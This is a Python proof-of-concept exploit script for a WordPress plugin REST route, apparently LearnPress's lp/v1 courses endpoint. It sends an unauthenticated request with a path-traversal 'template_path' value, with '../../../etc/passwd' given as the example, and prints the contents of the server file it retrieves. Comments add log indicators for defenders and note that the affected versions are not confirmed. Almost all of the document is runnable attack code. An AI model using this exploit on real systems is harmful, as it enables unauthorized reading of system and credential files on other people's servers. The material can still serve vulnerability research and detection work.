POC / exploit.py PY
import requests
import argparse
import json
import os

#
# Exploit script by @RandomRobbieBF
#

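# What this script does: sends one unauthenticated GET to the WordPress REST
# route /wp-json/lp/v1/courses/archive-course with `template_path` set to the
# path given on the command line and `return_type=html`, then prints the
# `data.content` field of the JSON reply when `status` is "success".
#
# Defender notes:
# - The request appears in web access logs as a GET to the route above with a
#   `template_path` query parameter; a value that is not a template name
#   (for example one containing `../`) is the indicator to alert on.
# - NOTE(review): the `lp/v1` namespace presumably belongs to the LearnPress
#   plugin, and the page names neither the affected nor the fixed release.
#   Confirm both against the vendor advisory before relying on this.

# An empty string here overrides any HTTP(S)_PROXY value inherited from the
# environment for the lifetime of this process.
http_proxy = ""
os.environ['HTTP_PROXY'] = http_proxy
os.environ['HTTPS_PROXY'] = http_proxy

# Upper bound (seconds) on connect/read so an unresponsive host cannot hang
# the script indefinitely; the original call had no timeout.
REQUEST_TIMEOUT = 30

# Set a real user agent
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'
}

parser = argparse.ArgumentParser()
parser.add_argument("-u","--url", required=True,help="WordPress URL e.g. https://example.com")
parser.add_argument("-f","--file", required=True,help="File path to retrieve e.g. ../../../etc/passwd")
args = parser.parse_args()

endpoint = f"{args.url}/wp-json/lp/v1/courses/archive-course"

query = {
    "template_path": args.file,
    "return_type": "html"
}

# verify=False below disables TLS certificate validation, so the identity of
# the responding server is not checked; this call only silences the warning
# urllib3 would otherwise print for that.
requests.packages.urllib3.disable_warnings()

try:
    response = requests.get(
        endpoint,
        params=query,
        verify=False,
        headers=headers,
        timeout=REQUEST_TIMEOUT,
    )
except requests.exceptions.RequestException as e:
    # Covers connection failures and timeouts alike.
    print(f"Error: {e}")
else:
    # Report the HTTP status before attempting to parse the body: the
    # original parsed JSON first and crashed with an uncaught ValueError on
    # any non-JSON reply (HTML error page, WAF block page, empty body).
    if response.status_code != 200:
        print("Status code:   %i" % response.status_code)
        print("Response body: %s" % response.content)

    if "No route was found matching the URL and request method" in response.text:
        # The REST route is not registered on this site; nothing to parse.
        print("No route was found matching the URL and request method")
    else:
        try:
            data = json.loads(response.text)
        except ValueError:
            # json.JSONDecodeError is a ValueError subclass.
            data = None
            print("Error: response body is not valid JSON")

        if isinstance(data, dict):
            if data.get('status') == 'success':
                try:
                    content = data['data']['content']
                except (KeyError, TypeError):
                    print("Error: success response has no data.content field")
                else:
                    print(content)
            else:
                # WordPress REST error bodies may lack 'status'; fall back to
                # the whole decoded body rather than raising KeyError.
                print(f"Error: {data.get('message', data)}")
        elif data is not None:
            print(f"Error: unexpected JSON response: {data!r}")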